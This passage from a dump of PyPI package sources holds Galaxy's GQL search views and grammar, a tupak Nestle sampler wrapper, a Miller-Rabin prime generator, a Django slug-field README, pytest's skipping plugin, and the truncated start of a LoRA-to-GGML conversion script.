"name": ViewField("name", sqlalchemy_field=(LibraryDatasetDatasetAssociation, "name")),
"id": ViewField("id", sqlalchemy_field=(LibraryDatasetDatasetAssociation, "id"), id_decode=True),
"deleted": ViewField("deleted", sqlalchemy_field=(LibraryDatasetDatasetAssociation, "deleted")),
"parent_library_id": ViewField("parent_library_id", id_decode=True, post_filter=ldda_parent_library_filter),
"data_type": ViewField("data_type", sqlalchemy_field=(LibraryDatasetDatasetAssociation, "extension")),
}
def search(self, trans):
self.query = trans.sa_session.query(LibraryDatasetDatasetAssociation)
##################
# Library Searching
##################
class LibraryView(ViewQueryBaseClass):
VIEW_NAME = "library"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(Library, "name")),
"id": ViewField("id", sqlalchemy_field=(Library, "id"), id_decode=True),
"deleted": ViewField("deleted", sqlalchemy_field=(Library, "deleted")),
}
def search(self, trans):
self.query = trans.sa_session.query(Library)
##################
# Library Folder Searching
##################
def library_folder_parent_library_id_filter(item, left, operator, right):
if operator == "=":
return item.parent_library.id == right
if operator == "!=":
return item.parent_library.id != right
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
def library_path_filter(item, left, operator, right):
lpath = f"/{'/'.join(item.library_path)}"
if operator == "=":
return lpath == right
if operator == "!=":
return lpath != right
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class LibraryFolderView(ViewQueryBaseClass):
VIEW_NAME = "library_folder"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(LibraryFolder, "name")),
"id": ViewField("id", sqlalchemy_field=(LibraryFolder, "id"), id_decode=True),
"parent_id": ViewField("parent_id", sqlalchemy_field=(LibraryFolder, "parent_id"), id_decode=True),
"parent_library_id": ViewField(
"parent_library_id", post_filter=library_folder_parent_library_id_filter, id_decode=True
),
"library_path": ViewField("library_path", post_filter=library_path_filter),
}
def search(self, trans):
self.query = trans.sa_session.query(LibraryFolder)
##################
# Library Dataset Searching
##################
def library_dataset_name_filter(item, left, operator, right):
if operator == "=":
return item.name == right
if operator == "!=":
return item.name != right
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class LibraryDatasetView(ViewQueryBaseClass):
VIEW_NAME = "library_dataset"
FIELDS = {
"name": ViewField("name", post_filter=library_dataset_name_filter),
"id": ViewField("id", sqlalchemy_field=(LibraryDataset, "id"), id_decode=True),
"folder_id": ViewField("folder_id", sqlalchemy_field=(LibraryDataset, "folder_id"), id_decode=True),
}
def search(self, trans):
self.query = trans.sa_session.query(LibraryDataset)
##################
# Tool Searching
##################
class ToolView(ViewQueryBaseClass):
VIEW_NAME = "tool"
FIELDS = {
"tool_id": ViewField("name", sqlalchemy_field=(ToolVersion, "tool_id")),
"id": ViewField("id", sqlalchemy_field=(ToolVersion, "id")),
}
def search(self, trans):
self.query = trans.install_model.context.query(ToolVersion)
##################
# History Dataset Searching
##################
def history_dataset_handle_tag(view, left, operator, right):
if operator == "=":
view.do_query = True
# aliasing the tag association table, so multiple links to different tags can be formed during a single query
tag_table = aliased(HistoryDatasetAssociationTagAssociation)
view.query = view.query.filter(HistoryDatasetAssociation.id == tag_table.history_dataset_association_id)
tmp = right.split(":")
view.query = view.query.filter(tag_table.user_tname == tmp[0])
if len(tmp) > 1:
view.query = view.query.filter(tag_table.user_value == tmp[1])
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
def history_dataset_extended_metadata_filter(view, left, operator, right):
view.do_query = True
if "extended_metadata_joined" not in view.state:
view.query = view.query.join(ExtendedMetadata)
view.state["extended_metadata_joined"] = True
alias = aliased(ExtendedMetadataIndex)
field = f"/{'/'.join(left.split('.')[1:])}"
view.query = view.query.filter(
and_(ExtendedMetadata.id == alias.extended_metadata_id, alias.path == field, alias.value == str(right))
)
class HistoryDatasetView(ViewQueryBaseClass):
DOMAIN = "history_dataset"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(HistoryDatasetAssociation, "name")),
"id": ViewField("id", sqlalchemy_field=(HistoryDatasetAssociation, "id"), id_decode=True),
"history_id": ViewField(
"history_id", sqlalchemy_field=(HistoryDatasetAssociation, "history_id"), id_decode=True
),
"tag": ViewField("tag", handler=history_dataset_handle_tag),
"copied_from_ldda_id": ViewField(
"copied_from_ldda_id",
sqlalchemy_field=(HistoryDatasetAssociation, "copied_from_library_dataset_dataset_association_id"),
id_decode=True,
),
"copied_from_hda_id": ViewField(
"copied_from_hda_id",
sqlalchemy_field=(HistoryDatasetAssociation, "copied_from_history_dataset_association_id"),
id_decode=True,
),
"deleted": ViewField("deleted", sqlalchemy_field=(HistoryDatasetAssociation, "deleted")),
"extended_metadata": ViewField("extended_metadata", handler=history_dataset_extended_metadata_filter),
}
def search(self, trans):
self.query = trans.sa_session.query(HistoryDatasetAssociation)
##################
# History Searching
##################
def history_handle_tag(view, left, operator, right):
if operator == "=":
view.do_query = True
tag_table = aliased(HistoryTagAssociation)
view.query = view.query.filter(History.id == tag_table.history_id)
tmp = right.split(":")
view.query = view.query.filter(tag_table.user_tname == tmp[0])
if len(tmp) > 1:
view.query = view.query.filter(tag_table.user_value == tmp[1])
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
def history_handle_annotation(view, left, operator, right):
if operator == "=":
view.do_query = True
view.query = view.query.filter(
and_(
HistoryAnnotationAssociation.history_id == History.id, HistoryAnnotationAssociation.annotation == right
)
)
elif operator == "like":
view.do_query = True
view.query = view.query.filter(
and_(
HistoryAnnotationAssociation.history_id == History.id,
HistoryAnnotationAssociation.annotation.like(right),
)
)
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class HistoryView(ViewQueryBaseClass):
DOMAIN = "history"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(History, "name")),
"id": ViewField("id", sqlalchemy_field=(History, "id"), id_decode=True),
"tag": ViewField("tag", handler=history_handle_tag),
"annotation": ViewField("annotation", handler=history_handle_annotation),
"deleted": ViewField("deleted", sqlalchemy_field=(History, "deleted")),
}
def search(self, trans):
self.query = trans.sa_session.query(History)
##################
# Workflow Searching
##################
def workflow_tag_handler(view, left, operator, right):
if operator == "=":
view.do_query = True
view.query = view.query.filter(StoredWorkflow.id == StoredWorkflowTagAssociation.stored_workflow_id)
tmp = right.split(":")
view.query = view.query.filter(StoredWorkflowTagAssociation.user_tname == tmp[0])
if len(tmp) > 1:
view.query = view.query.filter(StoredWorkflowTagAssociation.user_value == tmp[1])
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class WorkflowView(ViewQueryBaseClass):
DOMAIN = "workflow"
FIELDS = {
"name": ViewField("name", sqlalchemy_field=(StoredWorkflow, "name")),
"id": ViewField("id", sqlalchemy_field=(StoredWorkflow, "id"), id_decode=True),
"tag": ViewField("tag", handler=workflow_tag_handler),
"deleted": ViewField("deleted", sqlalchemy_field=(StoredWorkflow, "deleted")),
}
def search(self, trans):
self.query = trans.sa_session.query(StoredWorkflow)
##################
# Job Searching
##################
def job_param_filter(view, left, operator, right):
view.do_query = True
alias = aliased(JobParameter)
param_name = re.sub(r"^param.", "", left)
view.query = view.query.filter(and_(Job.id == alias.job_id, alias.name == param_name, alias.value == dumps(right)))
def job_input_hda_filter(view, left, operator, right):
view.do_query = True
alias = aliased(JobToInputDatasetAssociation)
param_name = re.sub(r"^input_hda.", "", left)
view.query = view.query.filter(and_(Job.id == alias.job_id, alias.name == param_name, alias.dataset_id == right))
def job_input_ldda_filter(view, left, operator, right):
view.do_query = True
alias = aliased(JobToInputLibraryDatasetAssociation)
param_name = re.sub(r"^input_ldda.", "", left)
view.query = view.query.filter(and_(Job.id == alias.job_id, alias.name == param_name, alias.ldda_id == right))
def job_output_hda_filter(view, left, operator, right):
view.do_query = True
alias = aliased(JobToOutputDatasetAssociation)
param_name = re.sub(r"^output_hda.", "", left)
view.query = view.query.filter(and_(Job.id == alias.job_id, alias.name == param_name, alias.dataset_id == right))
class JobView(ViewQueryBaseClass):
DOMAIN = "job"
FIELDS = {
"tool_name": ViewField("tool_name", sqlalchemy_field=(Job, "tool_id")),
"state": ViewField("state", sqlalchemy_field=(Job, "state")),
"param": ViewField("param", handler=job_param_filter),
"input_ldda": ViewField("input_ldda", handler=job_input_ldda_filter, id_decode=True),
"input_hda": ViewField("input_hda", handler=job_input_hda_filter, id_decode=True),
"output_hda": ViewField("output_hda", handler=job_output_hda_filter, id_decode=True),
}
def search(self, trans):
self.query = trans.sa_session.query(Job)
##################
# Page Searching
##################
class PageView(ViewQueryBaseClass):
DOMAIN = "page"
FIELDS = {
"id": ViewField("id", sqlalchemy_field=(Page, "id"), id_decode=True),
"slug": ViewField("slug", sqlalchemy_field=(Page, "slug")),
"title": ViewField("title", sqlalchemy_field=(Page, "title")),
"deleted": ViewField("deleted", sqlalchemy_field=(Page, "deleted")),
}
def search(self, trans):
self.query = trans.sa_session.query(Page)
##################
# Page Revision Searching
##################
class PageRevisionView(ViewQueryBaseClass):
DOMAIN = "page_revision"
FIELDS = {
"id": ViewField("id", sqlalchemy_field=(PageRevision, "id"), id_decode=True),
"title": ViewField("title", sqlalchemy_field=(PageRevision, "title")),
"page_id": ViewField("page_id", sqlalchemy_field=(PageRevision, "page_id"), id_decode=True),
}
def search(self, trans):
self.query = trans.sa_session.query(PageRevision)
# The view mapping takes a user's name for a table and maps it to a View class
# that will handle queries.
view_mapping = {
"library": LibraryView,
"library_folder": LibraryFolderView,
"library_dataset_dataset": LibraryDatasetDatasetView,
"library_dataset": LibraryDatasetView,
"lda": LibraryDatasetView,
"ldda": LibraryDatasetDatasetView,
"history_dataset": HistoryDatasetView,
"hda": HistoryDatasetView,
"history": HistoryView,
"workflow": WorkflowView,
"tool": ToolView,
"job": JobView,
"page": PageView,
"page_revision": PageRevisionView,
}
# The GQL gramar is defined in Parsley syntax ( https://parsley.readthedocs.io/ )
gqlGrammar = r"""
expr = 'select' bs field_desc:f bs 'from' bs word:t (
bs 'where' bs conditional:c ws -> GalaxyQuery(f,t,c)
| ws -> GalaxyQuery(f, t, None) )
bs = ' '+
ws = ' '*
field_desc = ( '*' -> ['*']
| field_list )
field_list = field_name:x (
ws ',' ws field_list:y -> [x] + y
| -> [x]
)
conditional = logic_statement:x (
bs 'and' bs conditional:y -> GalaxyQueryAnd(x,y)
| -> x
)
word = alphanum+:x -> "".join(x)
field_name = word:x (
'.' quote_word:y -> x + "." + y
|-> x
)
alphanum = anything:x ?(re.search(r'\w', x) is not None) -> x
logic_statement = field_name:left ws comparison:comp ws value_word:right -> GalaxyQueryComparison(left, comp, right)
value_word = (
'false' -> False
| 'False' -> False
| 'true' -> True
| 'True' -> True
| 'None' -> None
| quote_word )
comparison = ( '=' -> '='
| '>' -> '>'
| '<' -> '<'
| '!=' -> '!='
| '>=' -> '>='
| '<=' -> '<='
| 'like' -> 'like'
)
quote_word = "'" not_quote*:x "'" -> "".join(x)
not_quote = anything:x ?(x != "'") -> x
not_dquote = anything:x ?(x != '"') -> x
"""
class GalaxyQuery:
"""
This class represents a data structure of a compiled GQL query
"""
def __init__(self, field_list, table_name, conditional):
self.field_list = field_list
self.table_name = table_name
self.conditional = conditional
class GalaxyQueryComparison:
"""
This class represents the data structure of the comparison arguments of a
compiled GQL query (ie where name='Untitled History')
"""
def __init__(self, left, operator, right):
self.left = left
self.operator = operator
self.right = right
class GalaxyQueryAnd:
"""
This class represents the data structure of the comparison arguments of a
compiled GQL query (ie where name='Untitled History')
"""
def __init__(self, left, right):
self.left = left
self.operator = "and"
self.right = right
class GalaxyParseError(Exception):
pass
class SearchQuery:
def __init__(self, view, query):
self.view = view
self.query = query
def decode_query_ids(self, trans):
if self.query.conditional is not None:
self.view.decode_query_ids(trans, self.query.conditional)
def process(self, trans):
self.view.search(trans)
if self.query.conditional is not None:
self.view.filter(self.query.conditional.left, self.query.conditional.operator, self.query.conditional.right)
return self.view.get_results(True)
def item_to_api_value(self, item):
r = item.to_dict(view="element")
if self.query.field_list.count("*"):
return r
o = {}
for a in r:
if a in self.query.field_list:
o[a] = r[a]
return o
class GalaxySearchEngine:
"""
Primary class for searching. Parses GQL (Galaxy Query Language) queries and returns a 'SearchQuery' class
"""
def __init__(self):
self.parser = parsley.makeGrammar(
gqlGrammar,
{
"re": re,
"GalaxyQuery": GalaxyQuery,
"GalaxyQueryComparison": GalaxyQueryComparison,
"GalaxyQueryAnd": GalaxyQueryAnd,
},
)
def query(self, query_text):
q = self.parser(query_text).expr()
if q.table_name in view_mapping:
view = view_mapping[q.table_name]()
return SearchQuery(view, q)
raise GalaxyParseError(f"No such table {q.table_name}") | PypiClean |
/tupak-0.2.3.tar.gz/tupak-0.2.3/tupak/core/sampler/nestle.py | from __future__ import absolute_import
import numpy as np
from pandas import DataFrame
from .base_sampler import NestedSampler
class Nestle(NestedSampler):
"""tupak wrapper `nestle.Sampler` (http://kylebarbary.com/nestle/)
All positional and keyword arguments (i.e., the args and kwargs) passed to
`run_sampler` will be propagated to `nestle.sample`, see documentation for
that function for further help. Under Keyword Arguments, we list commonly
used kwargs and the tupak defaults
Keyword Arguments
------------------
npoints: int
The number of live points, note this can also equivalently be given as
one of [nlive, nlives, n_live_points]
method: {'classic', 'single', 'multi'} ('multi')
Method used to select new points
verbose: Bool
If true, print information information about the convergence during
sampling
"""
default_kwargs = dict(verbose=True, method='multi', npoints=500,
update_interval=None, npdim=None, maxiter=None,
maxcall=None, dlogz=None, decline_factor=None,
rstate=None, callback=None)
def _translate_kwargs(self, kwargs):
if 'npoints' not in kwargs:
for equiv in self.npoints_equiv_kwargs:
if equiv in kwargs:
kwargs['npoints'] = kwargs.pop(equiv)
def _verify_kwargs_against_default_kwargs(self):
if self.kwargs['verbose']:
import nestle
self.kwargs['callback'] = nestle.print_progress
self.kwargs.pop('verbose')
NestedSampler._verify_kwargs_against_default_kwargs(self)
def run_sampler(self):
""" Runs Nestle sampler with given kwargs and returns the result
Returns
-------
tupak.core.result.Result: Packaged information about the result
"""
import nestle
out = nestle.sample(
loglikelihood=self.log_likelihood,
prior_transform=self.prior_transform,
ndim=self.ndim, **self.kwargs)
print("")
self.result.sampler_output = out
self.result.samples = nestle.resample_equal(out.samples, out.weights)
self.result.nested_samples = DataFrame(
out.samples, columns=self.search_parameter_keys)
self.result.nested_samples['weights'] = out.weights
self.result.nested_samples['log_likelihood'] = out.logl
idxs = [np.unique(np.where(self.result.samples[ii] == out.samples)[0])
for ii in range(len(out.logl))]
self.result.log_likelihood_evaluations = out.logl[idxs]
self.result.log_evidence = out.logz
self.result.log_evidence_err = out.logzerr
return self.result
def _run_test(self):
"""
Runs to test whether the sampler is properly running with the given
kwargs without actually running to the end
Returns
-------
tupak.core.result.Result: Dummy container for sampling results.
"""
import nestle
kwargs = self.kwargs.copy()
kwargs['maxiter'] = 2
nestle.sample(
loglikelihood=self.log_likelihood,
prior_transform=self.prior_transform,
ndim=self.ndim, **kwargs)
self.result.samples = np.random.uniform(0, 1, (100, self.ndim))
self.result.log_evidence = np.nan
self.result.log_evidence_err = np.nan
return self.result | PypiClean |
/CeroCoinClient-2.0.1.tar.gz/CeroCoinClient-2.0.1/PrimeGenerator/PrimeGenerator.py | __version__ = '1.9.0'
__author__ = "Avinash Kak (kak@purdue.edu)"
__date__ = '2018-March-18'
__url__ = 'https://engineering.purdue.edu/kak/distCeroCoin/CeroCoinClient-1-9.0.html'
__copyright__ = "(C) 2018 Avinash Kak. Python Software Foundation."
__doc__ = '''
Call syntax:
PrimeGenerator.py width_desired_for_bit_field_for_prime
For example, if you call
PrimeGenerator.py 32
you may get a prime that looks like 3262037833. On the other hand, if you
call
PrimeGenerator.py 128
you may get a prime that looks like 338816507393364952656338247029475569761
IMPORTANT: The two most significant are explicitly set for the prime that is
returned.
'''
#from CeroCoinClient import CeroCoinClient
import sys
import random
############################ class PrimeGenerator ##############################
class PrimeGenerator( object ): #(A1)
def __init__( self, **kwargs ): #(A2)
bits = debug = None #(A3)
if 'bits' in kwargs : bits = kwargs.pop('bits') #(A4)
if 'debug' in kwargs : debug = kwargs.pop('debug') #(A5)
self.bits = bits #(A6)
self.debug = debug #(A7)
self._largest = (1 << bits) - 1 #(A8)
def set_initial_candidate(self): #(B1)
candidate = random.getrandbits( self.bits ) #(B2)
if candidate & 1 == 0: candidate += 1 #(B3)
candidate |= (1 << self.bits-1) #(B4)
candidate |= (2 << self.bits-3) #(B5)
self.candidate = candidate #(B6)
def set_probes(self): #(C1)
self.probes = [2,3,5,7,11,13,17] #(C2)
# This is the same primality testing function as shown earlier
# in Section 11.5.6 of Lecture 11:
def test_candidate_for_prime(self): #(D1)
'returns the probability if candidate is prime with high probability'
p = self.candidate #(D2)
if p == 1: return 0 #(D3)
if p in self.probes: #(D4)
self.probability_of_prime = 1 #(D5)
return 1 #(D6)
if any([p % a == 0 for a in self.probes]): return 0 #(D7)
k, q = 0, self.candidate-1 #(D8)
while not q&1: #(D9)
q >>= 1 #(D10)
k += 1 #(D11)
if self.debug: print("q = %d k = %d" % (q,k)) #(D12)
for a in self.probes: #(D13)
a_raised_to_q = pow(a, q, p) #(D14)
if a_raised_to_q == 1 or a_raised_to_q == p-1: continue #(D15)
a_raised_to_jq = a_raised_to_q #(D16)
primeflag = 0 #(D17)
for j in range(k-1): #(D18)
a_raised_to_jq = pow(a_raised_to_jq, 2, p) #(D19)
if a_raised_to_jq == p-1: #(D20)
primeflag = 1 #(D21)
break #(D22)
if not primeflag: return 0 #(D23)
self.probability_of_prime = 1 - 1.0/(4 ** len(self.probes)) #(D24)
return self.probability_of_prime #(D25)
def findPrime(self): #(E1)
self.set_initial_candidate() #(E2)
if self.debug: print(" candidate is: %d" % self.candidate) #(E3)
self.set_probes() #(E4)
if self.debug: print(" The probes are: %s" % str(self.probes)) #(E5)
max_reached = 0 #(E6)
while 1: #(E7)
if self.test_candidate_for_prime(): #(E8)
if self.debug: #(E9)
print("Prime number: %d with probability %f\n" %
(self.candidate, self.probability_of_prime) ) #(E10)
break #(E11)
else: #(E12)
if max_reached: #(E13)
self.candidate -= 2 #(E14)
elif self.candidate >= self._largest - 2: #(E15)
max_reached = 1 #(E16)
self.candidate -= 2 #(E17)
else: #(E18)
self.candidate += 2 #(E19)
if self.debug: #(E20)
print(" candidate is: %d" % self.candidate) #(E21)
return self.candidate #(E22)
#################################### main ######################################
if __name__ == '__main__':
if len( sys.argv ) != 2: #(M1)
sys.exit( "Call syntax: PrimeGenerator.py width_of_bit_field" ) #(M2)
num_of_bits_desired = int(sys.argv[1]) #(M3)
generator = PrimeGenerator( bits = num_of_bits_desired ) #(M4)
prime = generator.findPrime() #(M5)
print("Prime returned: %d" % prime) #(M6) | PypiClean |
/django-centralniak-slugfield-0.1.5.tar.gz/django-centralniak-slugfield-0.1.5/README.rst | django-centralniak-slugfield
============================
This tiny project adds new Django field type ``CentralniakSlugField`` that automatically creates and/or updates
slug on save. The slug method supports far more regional characters then the core Django one (yes, cyrillic
alphabet is supported).
Project was somewhat inspired by `Doctrine ORM's approach <http://www.doctrine-project.org/documentation/manual/1_0/en/behaviors:core-behaviors:sluggable>`_ to slugs.
Features:
---------
1. You can choose which fields to populate a slug form (single or multifield slug)
2. You can choose if slug should be updated on record update or only on creation
3. Possibility to make slugs unique per given expression only (for example given date)
Installation:
-------------
* Put ``django_centralniak_slugfield`` in your ``INSTALLED_APPS``
Usage:
------
::
from django_centralniak_slugfield import CentralniakSlugField
class MyModel(models.model):
fieldname1 = models.CharField(max_length=12)
fieldname2 = models.CharField(max_length=34)
other_model = models.ForeignKey(OtherModel)
slug = CentralniakSlugField(populate_from=['fieldname1', 'fieldname2'], update_on_edit=False, unique_for=['other_model'])
Kudos:
------
Samuel Adam for the slughifi module (couldn't find it online anymore) | PypiClean |
/django-templateselector-0.2.0.tar.gz/django-templateselector-0.2.0/.eggs/pytest-3.2.1-py2.7.egg/_pytest/skipping.py | from __future__ import absolute_import, division, print_function
import os
import sys
import traceback
import py
from _pytest.config import hookimpl
from _pytest.mark import MarkInfo, MarkDecorator
from _pytest.outcomes import fail, skip, xfail, TEST_OUTCOME
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption('--runxfail',
action="store_true", dest="runxfail", default=False,
help="run tests even if they are marked xfail")
parser.addini("xfail_strict", "default for the strict parameter of xfail "
"markers when not given explicitly (default: "
"False)",
default=False,
type="bool")
def pytest_configure(config):
if config.option.runxfail:
# yay a hack
import pytest
old = pytest.xfail
config._cleanup.append(lambda: setattr(pytest, "xfail", old))
def nop(*args, **kwargs):
pass
nop.Exception = xfail.Exception
setattr(pytest, "xfail", nop)
config.addinivalue_line("markers",
"skip(reason=None): skip the given test function with an optional reason. "
"Example: skip(reason=\"no way of currently testing this\") skips the "
"test."
)
config.addinivalue_line("markers",
"skipif(condition): skip the given test function if eval(condition) "
"results in a True value. Evaluation happens within the "
"module global context. Example: skipif('sys.platform == \"win32\"') "
"skips the test if we are on the win32 platform. see "
"http://pytest.org/latest/skipping.html"
)
config.addinivalue_line("markers",
"xfail(condition, reason=None, run=True, raises=None, strict=False): "
"mark the test function as an expected failure if eval(condition) "
"has a True value. Optionally specify a reason for better reporting "
"and run=False if you don't even want to execute the test function. "
"If only specific exception(s) are expected, you can list them in "
"raises, and if the test fails in other ways, it will be reported as "
"a true failure. See http://pytest.org/latest/skipping.html"
)
class MarkEvaluator:
def __init__(self, item, name):
self.item = item
self.name = name
@property
def holder(self):
return self.item.keywords.get(self.name)
def __bool__(self):
return bool(self.holder)
__nonzero__ = __bool__
def wasvalid(self):
return not hasattr(self, 'exc')
def invalidraise(self, exc):
raises = self.get('raises')
if not raises:
return
return not isinstance(exc, raises)
def istrue(self):
try:
return self._istrue()
except TEST_OUTCOME:
self.exc = sys.exc_info()
if isinstance(self.exc[1], SyntaxError):
msg = [" " * (self.exc[1].offset + 4) + "^", ]
msg.append("SyntaxError: invalid syntax")
else:
msg = traceback.format_exception_only(*self.exc[:2])
fail("Error evaluating %r expression\n"
" %s\n"
"%s"
% (self.name, self.expr, "\n".join(msg)),
pytrace=False)
def _getglobals(self):
d = {'os': os, 'sys': sys, 'config': self.item.config}
if hasattr(self.item, 'obj'):
d.update(self.item.obj.__globals__)
return d
def _istrue(self):
if hasattr(self, 'result'):
return self.result
if self.holder:
if self.holder.args or 'condition' in self.holder.kwargs:
self.result = False
# "holder" might be a MarkInfo or a MarkDecorator; only
# MarkInfo keeps track of all parameters it received in an
# _arglist attribute
marks = getattr(self.holder, '_marks', None) \
or [self.holder.mark]
for _, args, kwargs in marks:
if 'condition' in kwargs:
args = (kwargs['condition'],)
for expr in args:
self.expr = expr
if isinstance(expr, py.builtin._basestring):
d = self._getglobals()
result = cached_eval(self.item.config, expr, d)
else:
if "reason" not in kwargs:
# XXX better be checked at collection time
msg = "you need to specify reason=STRING " \
"when using booleans as conditions."
fail(msg)
result = bool(expr)
if result:
self.result = True
self.reason = kwargs.get('reason', None)
self.expr = expr
return self.result
else:
self.result = True
return getattr(self, 'result', False)
def get(self, attr, default=None):
return self.holder.kwargs.get(attr, default)
def getexplanation(self):
expl = getattr(self, 'reason', None) or self.get('reason', None)
if not expl:
if not hasattr(self, 'expr'):
return ""
else:
return "condition: " + str(self.expr)
return expl
@hookimpl(tryfirst=True)
def pytest_runtest_setup(item):
# Check if skip or skipif are specified as pytest marks
skipif_info = item.keywords.get('skipif')
if isinstance(skipif_info, (MarkInfo, MarkDecorator)):
eval_skipif = MarkEvaluator(item, 'skipif')
if eval_skipif.istrue():
item._evalskip = eval_skipif
skip(eval_skipif.getexplanation())
skip_info = item.keywords.get('skip')
if isinstance(skip_info, (MarkInfo, MarkDecorator)):
item._evalskip = True
if 'reason' in skip_info.kwargs:
skip(skip_info.kwargs['reason'])
elif skip_info.args:
skip(skip_info.args[0])
else:
skip("unconditional skip")
item._evalxfail = MarkEvaluator(item, 'xfail')
check_xfail_no_run(item)
@hookimpl(hookwrapper=True)
def pytest_pyfunc_call(pyfuncitem):
check_xfail_no_run(pyfuncitem)
outcome = yield
passed = outcome.excinfo is None
if passed:
check_strict_xfail(pyfuncitem)
def check_xfail_no_run(item):
"""check xfail(run=False)"""
if not item.config.option.runxfail:
evalxfail = item._evalxfail
if evalxfail.istrue():
if not evalxfail.get('run', True):
xfail("[NOTRUN] " + evalxfail.getexplanation())
def check_strict_xfail(pyfuncitem):
"""check xfail(strict=True) for the given PASSING test"""
evalxfail = pyfuncitem._evalxfail
if evalxfail.istrue():
strict_default = pyfuncitem.config.getini('xfail_strict')
is_strict_xfail = evalxfail.get('strict', strict_default)
if is_strict_xfail:
del pyfuncitem._evalxfail
explanation = evalxfail.getexplanation()
fail('[XPASS(strict)] ' + explanation, pytrace=False)
@hookimpl(hookwrapper=True)
def pytest_runtest_makereport(item, call):
outcome = yield
rep = outcome.get_result()
evalxfail = getattr(item, '_evalxfail', None)
evalskip = getattr(item, '_evalskip', None)
# unitttest special case, see setting of _unexpectedsuccess
if hasattr(item, '_unexpectedsuccess') and rep.when == "call":
from _pytest.compat import _is_unittest_unexpected_success_a_failure
if item._unexpectedsuccess:
rep.longrepr = "Unexpected success: {0}".format(item._unexpectedsuccess)
else:
rep.longrepr = "Unexpected success"
if _is_unittest_unexpected_success_a_failure():
rep.outcome = "failed"
else:
rep.outcome = "passed"
rep.wasxfail = rep.longrepr
elif item.config.option.runxfail:
pass # don't interefere
elif call.excinfo and call.excinfo.errisinstance(xfail.Exception):
rep.wasxfail = "reason: " + call.excinfo.value.msg
rep.outcome = "skipped"
elif evalxfail and not rep.skipped and evalxfail.wasvalid() and \
evalxfail.istrue():
if call.excinfo:
if evalxfail.invalidraise(call.excinfo.value):
rep.outcome = "failed"
else:
rep.outcome = "skipped"
rep.wasxfail = evalxfail.getexplanation()
elif call.when == "call":
strict_default = item.config.getini('xfail_strict')
is_strict_xfail = evalxfail.get('strict', strict_default)
explanation = evalxfail.getexplanation()
if is_strict_xfail:
rep.outcome = "failed"
rep.longrepr = "[XPASS(strict)] {0}".format(explanation)
else:
rep.outcome = "passed"
rep.wasxfail = explanation
elif evalskip is not None and rep.skipped and type(rep.longrepr) is tuple:
# skipped by mark.skipif; change the location of the failure
# to point to the item definition, otherwise it will display
# the location of where the skip exception was raised within pytest
filename, line, reason = rep.longrepr
filename, line = item.location[:2]
rep.longrepr = filename, line, reason
# called by terminalreporter progress reporting
def pytest_report_teststatus(report):
if hasattr(report, "wasxfail"):
if report.skipped:
return "xfailed", "x", "xfail"
elif report.passed:
return "xpassed", "X", ("XPASS", {'yellow': True})
# called by the terminalreporter instance/plugin
def pytest_terminal_summary(terminalreporter):
tr = terminalreporter
if not tr.reportchars:
# for name in "xfailed skipped failed xpassed":
# if not tr.stats.get(name, 0):
# tr.write_line("HINT: use '-r' option to see extra "
# "summary info about tests")
# break
return
lines = []
for char in tr.reportchars:
if char == "x":
show_xfailed(terminalreporter, lines)
elif char == "X":
show_xpassed(terminalreporter, lines)
elif char in "fF":
show_simple(terminalreporter, lines, 'failed', "FAIL %s")
elif char in "sS":
show_skipped(terminalreporter, lines)
elif char == "E":
show_simple(terminalreporter, lines, 'error', "ERROR %s")
elif char == 'p':
show_simple(terminalreporter, lines, 'passed', "PASSED %s")
if lines:
tr._tw.sep("=", "short test summary info")
for line in lines:
tr._tw.line(line)
def show_simple(terminalreporter, lines, stat, format):
failed = terminalreporter.stats.get(stat)
if failed:
for rep in failed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
lines.append(format % (pos,))
def show_xfailed(terminalreporter, lines):
xfailed = terminalreporter.stats.get("xfailed")
if xfailed:
for rep in xfailed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
reason = rep.wasxfail
lines.append("XFAIL %s" % (pos,))
if reason:
lines.append(" " + str(reason))
def show_xpassed(terminalreporter, lines):
xpassed = terminalreporter.stats.get("xpassed")
if xpassed:
for rep in xpassed:
pos = terminalreporter.config.cwd_relative_nodeid(rep.nodeid)
reason = rep.wasxfail
lines.append("XPASS %s %s" % (pos, reason))
def cached_eval(config, expr, d):
if not hasattr(config, '_evalcache'):
config._evalcache = {}
try:
return config._evalcache[expr]
except KeyError:
import _pytest._code
exprcode = _pytest._code.compile(expr, mode="eval")
config._evalcache[expr] = x = eval(exprcode, d)
return x
def folded_skips(skipped):
d = {}
for event in skipped:
key = event.longrepr
assert len(key) == 3, (event, key)
d.setdefault(key, []).append(event)
l = []
for key, events in d.items():
l.append((len(events),) + key)
return l
def show_skipped(terminalreporter, lines):
tr = terminalreporter
skipped = tr.stats.get('skipped', [])
if skipped:
# if not tr.hasopt('skipped'):
# tr.write_line(
# "%d skipped tests, specify -rs for more info" %
# len(skipped))
# return
fskips = folded_skips(skipped)
if fskips:
# tr.write_sep("_", "skipped test summary")
for num, fspath, lineno, reason in fskips:
if reason.startswith("Skipped: "):
reason = reason[9:]
lines.append(
"SKIP [%d] %s:%d: %s" %
(num, fspath, lineno + 1, reason)) | PypiClean |
/fastllama_python_test-0.1.tar.gz/fastllama_python_test-0.1/scripts/convert-lora-to-ggml.py | from io import BufferedWriter
import json
import os
import re
import struct
import sys
from typing import Any, Mapping, MutableMapping, Sequence, Tuple
import argparse
import torch
from convert import DATA_TYPE_TO_FTYPE, NUMPY_TYPE_TO_DATA_TYPE, DataType
HF_SUBLAYER_TO_GGML: Mapping[str, str] = {
"self_attn.q_proj": "attention.wq",
"self_attn.k_proj": "attention.wk",
"self_attn.v_proj": "attention.wv",
"self_attn.o_proj": "attention.wo",
"mlp.gate_proj": "feed_forward.w1",
"mlp.down_proj": "feed_forward.w2",
"mlp.up_proj": "feed_forward.w3",
"input_layernorm": "attention_norm",
"post_attention_layernorm": "ffn_norm",
# "norm": "norm",
# "embed_tokens": "tok_embeddings",
# "lm_head": "output",
}
def translate_tensor_name(t: str) -> Tuple[str, str]:
